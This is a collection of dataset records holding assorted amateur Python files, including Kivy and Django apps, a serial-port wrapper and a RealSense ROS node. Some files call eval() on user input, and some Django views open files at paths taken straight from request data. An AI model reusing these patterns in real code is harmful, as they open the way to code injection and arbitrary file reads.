bytes')), locale)\n value /= 1024\n if value < 1024:\n return format_decimal(value, translate(_('0.# Kb')), locale)\n value /= 1024\n if value < 1024:\n return format_decimal(value, translate(_('0.0# Mb')), locale)\n value /= 1024\n return format_decimal(value, translate(_('0.0## Gb')), locale)\n","sub_path":"src/pyams_utils/size.py","file_name":"size.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"352361477","text":"def main():\n userInput = int(input('Enter a temperature in farenheit: '))\n\n def f2c(userInput):\n cel = ((userInput - 32) / (1.8))\n return cel\n\n print('you entered ',userInput,'in farenheit', 'which is ',f2c(userInput),'in celsius')\nmain()\nwhile True:\n userInput2 = str(input('Do you want to continue? Respond with Y or N '))\n if userInput2 == 'Y' or userInput2 =='y':\n main()\n else:\n break\n\n","sub_path":"Raturetemp.py","file_name":"Raturetemp.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"48198740","text":"#*coding:utf-8*\nimport socket\n\"\"\"\nTCP 的客户端编程\n1.socket\n2.connet (TCP)\n3.send\n4.close\n\"\"\"\n\n\ndef CC_client():\n # 创建\n tcp_cli = socket.socket(family=socket.AF_INET,type=socket.SOCK_STREAM)\n\n # 链接\n SER_IP = \"192.168.43.90\"\n SER_PORT = 8888\n ser_info = (SER_IP,SER_PORT)\n tcp_cli.connect(ser_info)\n\n #send\n while True:\n send_info = str(input(\"客户端发送:\"))\n # if send_info == \"exit\":\n # break\n tcp_cli.send(send_info.encode(\"utf-8\"))\n\n #recv\n\n tcp_cli_recv_info = tcp_cli.recv(1024)\n # print(\"客户端接收:%s\" % tcp_cli_recv_info.decode(\"utf-8\"))\n print(tcp_cli_recv_info)\n #clsoe\n tcp_cli.close()\n\nif __name__ == \"__main__\":\n CC_client()\n","sub_path":"001 网络编程/TCP_client_基本的收发数据.py","file_name":"TCP_client_基本的收发数据.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"468385482","text":"import math\nimport time\n\ndef compute():\n return sum(map(int, list(str(2 ** 1000))))\n\nif __name__ == \"__main__\":\n print(\"Start\")\n print(\"----------------------\")\n start = time.time()\n answer = compute()\n end = time.time()\n print(\"----------------------\")\n print(\"Answer : \", answer)\n print(\"End \", end - start, \"sec\")\n","sub_path":"python/p016.py","file_name":"p016.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"161197172","text":"\"\"\"\n Capstone Project. Code written by Antonio Juric.\n Fall term, 2018-2019.\n\"\"\"\n# \"\"\"\n# Make a robot project that makes a GUI, allows you to roll a dice with a number of sides between 2 given numbers\n# The robot then draws a polygon with that amount of sides, constantly checking to make sure it will not run into\n# anything.\n#\n# It also says the number of sides it is going to draw, and counts as it starts the sides\n# \"\"\"\nimport rosebotics_new as rb\nimport ev3dev.ev3 as ev3\n# import tkinter\n# from tkinter import ttk\n\n\ndef main():\n \"\"\" Runs YOUR specific part of the project \"\"\"\n # sensor = rb.ColorSensor()\n # print('Okay')\n # print(sensor.get_color())\n # print('REEEEEEEEEEEEEEEEE')\n # follow_circle()\n print('Main Started')\n no_touch()\n print('Main finished')\n # buttons_go()\n\n\ndef follow_circle():\n robot = rb.Snatch3rRobot()\n while True:\n robot.drive_system.start_moving(50, 50)\n robot.color_sensor.wait_until_color_is(6)\n robot.drive_system.turn_degrees(10)\n\n\ndef no_touch():\n robot = rb.Snatch3rRobot()\n print('Ready')\n while True:\n print(robot.proximity_sensor.get_distance_to_nearest_object_in_inches())\n if robot.proximity_sensor.get_distance_to_nearest_object_in_inches() <= 12:\n ev3.Sound.beep().wait(0.5)\n ev3.Sound.beep().wait(0.5)\n ev3.Sound.beep().wait(0.5)\n # ev3.Sound.speak('Reeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee')\n break\n print('Yay')\n#\n#\n# def buttons_go():\n# root = tkinter.Tk()\n# root.title('Robot Beep Boop')\n# frame = ttk.Frame(root, padding=30)\n# frame.grid()\n#\n# button = ttk.Button(frame, width=30, text='Start Controlling the Robot')\n# button.grid()\n# button['command'] = (lambda: 'oof')\n#\n# root.mainloop()\n\n\nmain()\n","sub_path":"src/Antonio.py","file_name":"Antonio.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"109955515","text":"import math\nmaxSize = 0.0000\nn = int(input())\nliOfPoints = []\nfor i in range(n):\n liOfPoints.append(list(eval(\"[\"+input()+\"]\")))\nedges = []\n# [from, to, lenSquare, center]\nfor i in range(n):\n for j in range(i+1, n):\n center = [(liOfPoints[i][0] + liOfPoints[j][0])/2, (liOfPoints[i][1] + liOfPoints[j][1])/2]\n lenSquare = pow((liOfPoints[i][0] - liOfPoints[j][0]), 2) + pow((liOfPoints[i][1] - liOfPoints[j][1]), 2)\n edges.append([liOfPoints[i], liOfPoints[j], lenSquare, center])\n\nfor i in range(len(edges)):\n for j in range(i+1, len(edges)):\n line1 = edges[i]\n line2 = edges[j]\n if line1[2] != line2[2] or line1[3] != line2[3]:\n continue\n sq1 = pow((line1[0][0] - line2[0][0]), 2) + pow((line1[0][1] - line2[0][1]), 2)\n sq2 = pow((line1[0][0] - line2[1][0]), 2) + pow((line1[0][1] - line2[1][1]), 2)\n maxSize = max(maxSize, sq1*sq2)\n\nprint(\"%.4d\" % math.sqrt(maxSize))","sub_path":"Code/CodeRecords/2330/60605/252240.py","file_name":"252240.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"481431030","text":"import time\nimport random\nfrom random import seed\nfrom random import randint\n\nfrom kivent_core.gameworld import GameWorld\nfrom kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager, Screen, CardTransition, WipeTransition\nfrom kivy.core.window import Window\nfrom kivy.clock import Clock\nfrom kivy.properties import StringProperty, NumericProperty, ObjectProperty\nfrom kivy.utils import platform\nfrom kivy.animation import Animation\nfrom kivent_core.systems.gamesystem import GameSystem\nfrom kivent_core.managers.resource_managers import texture_manager\nfrom kivy.uix.widget import Widget\nfrom kivy.lang import Builder\nimport kivent_core\n\nWindow.softinput_mode = 'below_target'\nWindow.keyboard_anim_args = {'d': 0.125, 't': 'in_out_quart'}\n\n\nthreadshell = ObjectProperty(None)\ntexture_manager.load_atlas('/home/whatnoww/Desktop/Configurable-Soundboard/png/assets.atlas')\n\n\nclass Principal(Screen):\n\n greenshell = ObjectProperty(None)\n redshell = ObjectProperty(None)\n redyx = NumericProperty(0)\n redyy = NumericProperty(0)\n greenx = NumericProperty(0)\n greeny = NumericProperty(0)\n backdropsrc = ObjectProperty(None)\n animtime = NumericProperty(99)\n backdropsource = ObjectProperty(None)\n layer1posx = NumericProperty(0.5)\n layer1posy = NumericProperty(0)\n layer2posx = NumericProperty(0)\n layer2posy = NumericProperty(0)\n stoploop = 0\n\n def __init__(self, **kwargs):\n super(Principal, self).__init__(**kwargs)\n self.gameworld.init_gameworld(\n ['renderer', 'position', 'rotate', 'color', 'scale'],\n callback=self.init_game)\n\n def init_game(self):\n self.setup_states()\n self.set_state()\n self.draw_objects()\n self.load_models()\n #self.assign_custom_ID()\n #self.using_basic_systems()\n\n def draw_objects(self):\n init_entity = self.gameworld.init_entity\n\n dict = {'renderer': {'texture': 'backdrop', 'render': True},\n 'position': (0, 0),\n 'rotate': 0,\n 'scale': 1,\n 'color': (255,255,255,255),\n }\n component_order = ['position', 'rotate', 'scale', 'color', 'renderer']\n background = init_entity(dict, component_order)\n\n print(self.gameworld.entities[background].entity_id)\n\n def setup_states(self):\n self.gameworld.add_state(state_name='main',\n systems_added=['renderer', 'position', 'rotate', 'color', 'scale'],\n systems_removed=[], systems_paused=[],\n systems_unpaused=['renderer'],\n screenmanager_screen='main')\n\n def load_models(self):\n model_manager = self.gameworld.model_manager\n model_manager.load_textured_rectangle('vertex_format_4f', 7., 7.,\n 'redshell', 'star1-4')\n model_manager.load_textured_rectangle('vertex_format_4f', 10., 10.,\n 'greenshell', 'star1-4-2')\n\n def set_state(self):\n self.gameworld.state = 'main'\n\n def on_pre_enter(self, *args):\n if wm.has_screen(\"setting\") is False:\n screen = Setting(name=\"setting\")\n wm.add_widget(screen)\n import datetime\n d = datetime.date.today()\n month = int(d.strftime('%m'))\n if month == 11:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n if month == 12:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n if month == 1:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n if month == 2:\n self.backdropsrc = './png/snow.zip'\n self.animtime = 0.016\n\n def on_enter(self, *args):\n l1 = Animation(layer1posx=0.8, layer1posy=1.5, duration=20)\n l2 = Animation(layer2posx=1, layer2posy=2, duration=20)\n l1 += Animation(layer1posx=1, layer1posy=-0.5, duration=0)\n l2 += Animation(layer2posx=1, layer2posy=-2, 
duration=0)\n l1 += Animation(layer1posx=0.3, layer1posy=1.5, duration=20)\n l2 += Animation(layer2posx=0, layer2posy=3, duration=20)\n l1 += Animation(layer1posx=0, layer1posy=-0.5, duration=0)\n l2 += Animation(layer2posx=0, layer2posy=-2, duration=0)\n l1.repeat = True\n l2.repeat = True\n l1.start(self)\n l2.start(self)\n Principal.stoploop = 0\n import threading\n t1 = threading.Thread(target=self.shells)\n t1.start()\n\n def on_leave(self, *args):\n Animation.cancel_all(self)\n Principal.stoploop = 1\n\n def shells(self, *args):\n if Principal.stoploop == 0:\n seed(time.time())\n valuexx1 = float(random.uniform(-0.2, 0))\n valuexx0 = float(random.uniform(1, 1.2))\n valueyy1 = float(random.uniform(-0.2, 0))\n valueyy0 = float(random.uniform(1, 1.2))\n valuex = float(random.uniform(-0.5, 1.5))\n valuey = float(random.uniform(-0.5, 1.5))\n resultx = 'valuexx' + str(int(valuex))\n resulty = 'valueyy' + str(int(valuey))\n redanim = Animation(redyx=(valuex), redyy=(valuey), duration=5)\n redanim.repeat = False\n greenanim = Animation(greenx=eval(resultx), greeny=eval(resulty), duration=5)\n greenanim.repeat = False\n redanim.start(self)\n greenanim.start(self)\n Clock.schedule_once(self.shells, 5)\n\n def play(self, directory, num):\n from kivy.core.audio import SoundLoader\n print(time.time())\n seed(time.time())\n # Good Times\n if num == 1:\n value = randint(1, 12)\n # Bad times\n if num == 2:\n value = randint(1, 7)\n # Item fruitbowl\n if num == 3:\n value = randint(1, 12)\n # Catchphrase\n if num == 4:\n value = randint(1, 13)\n # Oh baby!\n if num == 5:\n value = randint(1, 2)\n # Disbelief\n if num == 6:\n value = randint(1, 7)\n # Suprise\n if num == 7:\n value = randint(1, 3)\n # Let's go!\n if num == 8:\n value = randint(1, 5)\n # Wow!\n if num == 9:\n value = randint(1, 2)\n # Hey Troy!\n if num == 10:\n value = randint(1, 4)\n # Laugh\n if num == 11:\n value = randint(1, 5)\n # Random Noises\n if num == 12:\n value = randint(1, 3)\n # Random Frases\n if num == 13:\n value = randint(1, 4)\n # Bam! 
Shock Dodge!\n if num == 14:\n value = randint(1, 1)\n\n sound = SoundLoader.load(directory + str(value) + '.wav')\n if sound:\n leng = sound.length\n duration = float(leng)\n sound.play()\n\n def settings(self):\n wm.transition = CardTransition()\n wm.transition.direction = \"left\"\n wm.current = \"setting\"\n\n\nclass DebugPanel(Widget):\n fps = StringProperty(None)\n\n def __init__(self, **kwargs):\n super(DebugPanel, self).__init__(**kwargs)\n Clock.schedule_once(self.update_fps)\n\n def update_fps(self,dt):\n self.fps = str(int(Clock.get_fps()))\n Clock.schedule_once(self.update_fps, .05)\n\n\n\nclass Setting(Screen):\n\n def youtube(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://www.youtube.com/Nmeade\")\n\n def twitch(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://www.twitch.tv/Nmeade\")\n\n def twitter(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://twitter.com/nmeade\")\n\n def instagram(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://www.instagram.com/nmeade5/\")\n\n def git(self):\n import webbrowser\n if platform == \"android\":\n import android\n webbrowser.open(\"https://github.com/Whatnoww/Configurable-Soundboard\")\n\n\nclass WindowManager(ScreenManager):\n def __init__(self, **kwargs):\n super(WindowManager, self).__init__(**kwargs)\n Window.bind(on_keyboard=self.backpress)\n\n def backpress(self, window, key, *args):\n if key == 27:\n if self.current_screen.name == \"principal\":\n return False\n elif self.current_screen.name == \"setting\":\n wm.transition.direction = 'right'\n wm.current = \"principal\"\n return True\n\n\ndef loadapp(*args):\n screens = [Principal(name=\"principal\")]\n for screen in screens:\n wm.add_widget(screen)\n wm.transition = WipeTransition()\n Clock.schedule_once(homescreen, 4)\n\n\ndef homescreen(*args):\n wm.current = 'principal'\n\n\nclass Loader(Screen):\n float = ObjectProperty(None)\n\n def on_enter(self, *args):\n print('on enter fired')\n anim = Animation(backdrop=(0.2, 0.2, 0.7, 1), duration=1)\n anim += Animation(sizing=(5000, 5000), posing=(2375), duration=1)\n anim += Animation(imgvis=(1, 1, 1, 1), imgsize=(1, 1), duration=1)\n anim.start(self)\n Clock.schedule_once(loadapp, 0)\n Builder.unload_file('startup.kv')\n\n\nfrom kivy.lang import Builder\n\nBuilder.load_file('startup.kv')\nwm = WindowManager()\nwm.add_widget(Loader(name=\"loader\"))\n\n\nclass Primary(App):\n\n def build(self):\n return wm\n\n def on_enter(self):\n if platform == \"android\":\n Clock.schedule_once(self.remove_android_splash)\n\n def remove_android_splash(self, *args):\n from jnius import autoclass\n activity = autoclass('org.kivy.android.PythonActivity').mActivity\n activity.removeLoadingScreen()\n from android import hide_loading_screen\n hide_loading_screen()\n\n def on_pause(self, *args):\n Animation.cancel_all(Principal)\n Principal.stoploop = 1\n return True\n\n def on_resume(self, *args):\n pass\n\n\nif __name__ == \"__main__\":\n Primary().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"296930245","text":"from dataxmissionprotocol import Parser\nfrom serial import serial_for_url\nfrom serial.serialutil import SerialException, portNotOpenError\n\nclass SerialPort:\n __debugRead = False\n __debugWrite = False\n __port = None\n __errorProcessor = lambda e: e\n \n @staticmethod\n def close():\n if SerialPort.__port and SerialPort.__port.isOpen():\n SerialPort.__port.close()\n SerialPort.__port = None\n \n @staticmethod\n def getPacketType():\n return SerialPort.__packetType\n \n @staticmethod\n def open(path, **kw):\n SerialPort.close()\n \n try:\n SerialPort.__port = serial_for_url(path, **kw)\n \n return True\n \n except SerialException as e:\n SerialPort.__errorProcessor(e)\n \n @staticmethod\n def read(size):\n try:\n if not SerialPort.__port:\n raise portNotOpenError\n \n size = SerialPort.__packetType.getFormat().getTotalPacketSize(size)\n \n if SerialPort.__debugRead:\n print(f\"reading {size} bytes...\")\n \n buf = SerialPort.__port.read(size)\n \n if SerialPort.__debugRead:\n print(\"bytes read:\", list(buf))\n \n return SerialPort.__parser.parse(buf)\n \n except SerialException as e:\n SerialPort.__errorProcessor(e)\n \n @staticmethod\n def setDebug(debugRead = False, debugWrite = False):\n SerialPort.__debugRead = debugRead\n SerialPort.__debugWrite = debugWrite\n \n @staticmethod\n def setErrorProcessor(processor):\n SerialPort.__errorProcessor = processor\n \n @staticmethod\n def setPacketType(packetType):\n SerialPort.__packetType = packetType\n SerialPort.__parser = Parser(packetType.getFormat())\n \n @staticmethod\n def write(**kw):\n throw = kw.pop(\"throw\", False)\n \n return SerialPort.writePacket(SerialPort.__packetType(**kw), throw)\n \n @staticmethod\n def writePacket(packet, throw = False):\n if SerialPort.__debugWrite:\n print(list(packet.rawBuffer))\n return True\n \n try:\n if not SerialPort.__port:\n raise portNotOpenError\n \n SerialPort.__port.write(packet.rawBuffer)\n \n return True\n \n except SerialException as e:\n if throw:\n raise\n \n SerialPort.__errorProcessor(e)\n","sub_path":"commonutils/serialport.py","file_name":"serialport.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"558062022","text":"quantity, price = map(lambda x: int(x), input().split())\ncheque = []\nfor i in range(quantity):\n cheque_position = input()\n price_per_item, quantity, total_price = cheque_position.split()\n quantity = quantity[1:]\n total_price = total_price[1:]\n cheque.append({'price_per_item': int(price_per_item),\n 'quantity': int(quantity),\n 'total_price': int(total_price),\n 'id': i + 1})\nprice_in_cheque = (sum(item['total_price'] for item in cheque))\nprint(price - price_in_cheque)\nif price_in_cheque != price:\n for item in cheque:\n print(item['id']) if item['price_per_item'] * item['quantity'] != item['total_price'] else None","sub_path":"lab2/12.2.py","file_name":"12.2.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"595726636","text":"from AHP import G1\r\nfrom entropy import entropy\r\nfrom Evaluation import fuzzy\r\nimport pandas as pd\r\nimport numpy as np\r\npd.set_option('display.width',200)\r\nif __name__ == \"__main__\":\r\n # -----------数据引入-------------\r\n G1_array = pd.read_csv(\"TJU-LD-G1.csv\")\r\n Entropy_array = pd.read_csv(\"TJU-LD-Entropy.csv\")\r\n Fuzzy_array1 = pd.read_csv(\"TJU-LD-Fuzzy1.csv\")\r\n Fuzzy_array2 = pd.read_csv(\"TJU-LD-Fuzzy2.csv\")\r\n Fuzzy_array3 = pd.read_csv(\"TJU-LD-Fuzzy3.csv\")\r\n Fuzzy_array4 = pd.read_csv(\"TJU-LD-Fuzzy4.csv\")\r\n Fuzzy_array5 = pd.read_csv(\"TJU-LD-Fuzzy5.csv\")\r\n Fuzzy_array6 = pd.read_csv(\"TJU-LD-Fuzzy6.csv\")\r\n\r\n # -----------数据处理-------------\r\n # -------------G1----------------\r\n G1_label = list(G1_array.columns)\r\n G1_sort1 = np.array(G1_array.iloc[0])\r\n G1_iptc1 = np.array(G1_array.iloc[1].dropna(how='all'))\r\n G1_sort2 = np.array(G1_array.iloc[2])\r\n G1_iptc2 = np.array(G1_array.iloc[3].dropna(how='all'))\r\n G1_sort3 = np.array(G1_array.iloc[4])\r\n G1_iptc3 = np.array(G1_array.iloc[5].dropna(how='all'))\r\n G1_sort4 = np.array(G1_array.iloc[6])\r\n G1_iptc4 = np.array(G1_array.iloc[7].dropna(how='all'))\r\n G1_sort5 = np.array(G1_array.iloc[8])\r\n G1_iptc5 = np.array(G1_array.iloc[9].dropna(how='all'))\r\n G1_sort6 = np.array(G1_array.iloc[10])\r\n G1_iptc6 = np.array(G1_array.iloc[11].dropna(how='all'))\r\n\r\n # ------------Entropy-------------\r\n ent = np.array(Entropy_array).T\r\n\r\n # ------------Fuzzy---------------\r\n F_arr1 = np.array(Fuzzy_array1.iloc[0:12])\r\n F_scr1 = np.array(Fuzzy_array1.iloc[12])\r\n F_arr2 = np.array(Fuzzy_array2.iloc[0:12])\r\n F_scr2 = np.array(Fuzzy_array2.iloc[12])\r\n F_arr3 = np.array(Fuzzy_array3.iloc[0:12])\r\n F_scr3 = np.array(Fuzzy_array3.iloc[12])\r\n F_arr4 = np.array(Fuzzy_array4.iloc[0:12])\r\n F_scr4 = np.array(Fuzzy_array4.iloc[12])\r\n F_arr5 = np.array(Fuzzy_array5.iloc[0:12])\r\n F_scr5 = np.array(Fuzzy_array5.iloc[12])\r\n F_arr6 = np.array(Fuzzy_array6.iloc[0:12])\r\n F_scr6 = np.array(Fuzzy_array6.iloc[12])\r\n\r\n # ------------计算G1---------------\r\n subj_weight = []\r\n for i in range(1,7):\r\n print(\"G1法——专家{}\".format(i))\r\n gg = G1(eval('G1_iptc'+str(i)), ['Ip'+str(j) for j in range(1, 13)], eval('G1_sort'+str(i)))\r\n gg.construct().describe()\r\n subj_weight.append(gg.weight)\r\n subj_weight = np.array(subj_weight)\r\n subject = np.mean(subj_weight, axis=0)\r\n # ------------计算Entropy---------------\r\n e, object = entropy(ent)\r\n\r\n # ------------综合权重---------------\r\n w_fin = 0.6*subject+0.4*object\r\n print(\"综合权重为:\")\r\n print(w_fin)\r\n\r\n # ------------综合评价---------------\r\n cons = []\r\n for i in range(1,7):\r\n fuzz = fuzzy(eval('F_arr'+str(i)), w_fin, eval('F_scr'+str(i)), name=\"专家\"+str(i))\r\n fuzz.construct().describe()\r\n cons.append(fuzz.consequence)\r\n fin_fuzzy = np.array(cons).mean()\r\n fin_init = (ent.mean(axis=1)*w_fin).sum()\r\n f = 0.6*fin_fuzzy+0.4*fin_init\r\n print(\"初步评价:{}\".format(fin_init))\r\n print(\"模糊综合评价:{}\".format(fin_fuzzy))\r\n print(\"总评价:{}\".format(f))\r\n","sub_path":"Scientific literacy/Satisfaction_Delivery.py","file_name":"Satisfaction_Delivery.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"38858070","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom django.contrib.gis.gdal import DataSource\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\nfrom django.forms import forms\nimport datetime\nfrom .forms import ContactForm\nfrom .directorios import Directorio\nimport os \nfrom django.http import JsonResponse\nimport json \n \ndef hellow(request, question_id):\n text = \"welcome to my app number %s!
\"% question_id\n \n return HttpResponse(text)\n\ndef hoyes(request):\n ds = DataSource(settings.MEDIA_ROOT+ '\\\\dir2\\\\LotesCatastralesBog.shp')\n layer = ds[0]\n\n # Localizacion = layer.get_fields('Location')\n # Latitud = layer.get_fields('Latitude')\n # Longitud = layer.get_fields('Longitude')\n today = layer.fields\n return render(request, \"hola.html\",{\"hoyy\":today})\n\n\ndef get_info_file(request, file, folder):\n ds = DataSource(settings.MEDIA_ROOT+'\\\\'+folder+'\\\\'+file)\n layer = ds[0]\n datat ={}\n contador = 0\n for a in layer.fields:\n datat[contador] = a\n contador +=1 \n return JsonResponse(datat) \n\ndef informacionprueba(request):\n ds = DataSource('C:\\\\SIG\\\\loadInfo\\\\myform\\\\uploads\\\\myshp\\\\national_shapefile_obs.shp')\n layer = ds[0]\n campos = {'GaugeLID','Location','Latitude','Longitude'} \n listaCampos = {}\n\n informacion = {}\n contador = 0\n return JsonResponse(layer.field_types) \n\n\n \ndef informacion(request):\n ds = DataSource(settings.MEDIA_ROOT+ '\\\\'+request.POST['directorio']+'\\\\'+request.POST['nombre'])\n layer = ds[0]\n campos = request.POST['campos'].split(',')\n listaCampos = {}\n\n informacion = {}\n for c in campos:\n listaCampos[c] = layer.get_fields(c)\n\n return JsonResponse(listaCampos) \n \ndef home(request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n return redirect('/hello')\n else:\n form = ContactForm()\n return render(request, 'contacteme.html', {'form':form})\n\n\ndef simple_upload(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n folder = request.POST['directorio']\n fs = FileSystemStorage()\n filename = fs.save(folder+'\\\\'+myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'simple_upload.html', {\n 'uploaded_file_url': uploaded_file_url,'directorios': get_directorios(True, settings.MEDIA_ROOT) })\n return render(request, 'simple_upload.html',{'directorios': get_directorios(True, settings.MEDIA_ROOT)})\n\ndef get_directorios(folder, dir):\n files = os.listdir(dir)\n directorios = []\n for file in files:\n if file.find('.') == -1 and folder: \n directorios.append(file)\n else:\n directorios.append(file) \n return directorios\n\ndef get_contenido_directorio(request, carpeta): \n archivos = get_directorios(False, settings.MEDIA_ROOT+'\\\\'+carpeta)\n datat ={}\n contador = 0\n for a in archivos:\n datat[contador] = a\n contador +=1 \n return JsonResponse(datat) \n\ndef process(request):\n return render(request, 'contacteme.html', {'form':''})\n\ndef read(request):\n return render(request, 'contacteme.html', {'form':''})\n\ndef list(request):\n lcompleta = []\n carpetas = get_directorios(True, settings.MEDIA_ROOT)\n for c in carpetas:\n larchi = get_directorios(False, settings.MEDIA_ROOT+'\\\\'+c)\n for shp in larchi:\n if shp.endswith('.shp'): \n newdir = Directorio(shp,c)\n lcompleta.append(newdir)\n return render(request, 'lista.html', {'archivos':lcompleta})\n\n############################################################\n##########################GEOJSON###########################\n############################################################\ndef load_gj(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n folder = 'geojson'\n fs = FileSystemStorage()\n filename = fs.save(folder+'\\\\'+myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'upload_gj.html', {\n 'uploaded_file_url': 
uploaded_file_url })\n return render(request, 'upload_gj.html')\n\ndef read_gj(request):\n filename = request.POST['filename']\n f = open('C:\\\\SIG\\\\loadInfo\\\\myform\\\\uploads\\\\geojson\\\\'+filename, 'r')\n obj = json.load(f)\n \n #print(datat)\n return JsonResponse(obj) \n\ndef read_properties(obj):\n propiedades ={}\n contador = 0\n for o in obj:\n propiedades[contador] = {o:obj[o]}\n contador +=1 \n return propiedades \n\ndef listgj(request):\n lcompleta = []\n carpetas = get_directorios(False, settings.MEDIA_ROOT+'\\\\geojson')\n for geoj in carpetas:\n if geoj.find('.json') != -1: \n newdir = Directorio(geoj,'')\n lcompleta.append(newdir)\n return render(request, 'listageojson.html', {'archivos':lcompleta})\n\ndef map(request):\n 'Prueba Maps'\n return render(request,'osm.html')\n\n\n\n###################INTERSECCION#############################\ndef interseccion(request):\n lcompleta = []\n carpetas = get_directorios(False, settings.MEDIA_ROOT+'\\\\geojsonI')\n for geoj in carpetas:\n if geoj.find('.json') != -1: \n newdir = Directorio(geoj,'')\n lcompleta.append(newdir)\n return render(request, 'listageojsonI.html', {'archivos':lcompleta})","sub_path":"myform/mygeo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"54324677","text":"#!/usr/bin/python3.6\nimport pyrealsense2 as rs\nimport rospy\nimport cv2\nimport numpy as np\nfrom cv_bridge import CvBridge, CvBridgeError\n\n# for point_cloud\nfrom sensor_msgs.msg import Image, CameraInfo\n\n# D435 pipeline\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n\n# Start streaming\npipeline.start(config)\n\n# Start streaming with requested config\nconfig.enable_record_to_file('test1.bag')\n\n# Align depth to color \nalign_to = rs.stream.color\nalign = rs.align(align_to)\n\n# Node init and publisher definition\nrospy.init_node('realsense_rgb_align_depth', anonymous = True)\npub_color = rospy.Publisher(\"rgb_image\", Image, queue_size=2)\npub_align = rospy.Publisher(\"align_depth\", Image, queue_size=2)\npub_camera_info = rospy.Publisher(\"camera_info\", CameraInfo, queue_size=2)\nrate = rospy.Rate(30) # 30hz\n\n# get color camera data\nprofile = pipeline.get_active_profile()\ncolor_profile = rs.video_stream_profile(profile.get_stream(rs.stream.color))\ncolor_intrinsics = color_profile.get_intrinsics()\n\ncamera_info = CameraInfo()\ncamera_info.width = color_intrinsics.width\ncamera_info.height = color_intrinsics.height\ncamera_info.distortion_model = 'plumb_bob'\ncx = color_intrinsics.ppx\ncy = color_intrinsics.ppy\nfx = color_intrinsics.fx\nfy = color_intrinsics.fy\ncamera_info.K = [fx, 0, cx, 0, fy, cy, 0, 0, 1]\ncamera_info.D = [0, 0, 0, 0, 0]\ncamera_info.R = [1.0, 0, 0, 0, 1.0, 0, 0, 0, 1.0]\ncamera_info.P = [fx, 0, cx, 0, 0, fy, cy, 0, 0, 0, 1.0, 0]\n\nbridge = CvBridge()\n\nprint(\"Start node\")\n\n\nwhile not rospy.is_shutdown():\n \n # Get data from cameras\n frames = pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n\n # Publish color image\n color_image = np.asanyarray(color_frame.get_data())\n color_message = bridge.cv2_to_imgmsg(color_image, encoding=\"passthrough\")\n pub_color.publish(color_message)\n\n # Publish camera info\n pub_camera_info.publish(camera_info)\n\n # Publish align dpth to color image\n aligned_frames = align.process(frames)\n aligned_depth_frame = aligned_frames.get_depth_frame()\n align_depth = np.asanyarray(aligned_depth_frame.get_data())\n align_message = bridge.cv2_to_imgmsg(align_depth, encoding=\"passthrough\")\n pub_align.publish(align_message)\n\n rate.sleep()\n\n# Stop streaming\npipeline.stop()\n\n","sub_path":"realsense_node_python/src/realsense_rgb_align_depth.py","file_name":"realsense_rgb_align_depth.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
